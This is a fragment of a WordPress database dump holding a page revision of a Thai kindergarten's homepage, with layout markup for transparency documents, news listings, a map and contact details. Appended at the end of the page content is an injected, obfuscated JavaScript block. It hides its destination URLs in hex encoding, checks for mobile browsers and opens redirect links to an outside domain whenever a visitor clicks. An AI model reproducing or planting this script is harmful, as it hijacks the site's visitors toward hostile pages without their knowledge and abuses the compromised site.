900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1AeKeechkWj0RdYe5xvMgrFXsQiTu26xV/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-10-26 16:32:48','2025-10-26 09:32:48','',19,'http://watprato.ssk.in.th/?p=746',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
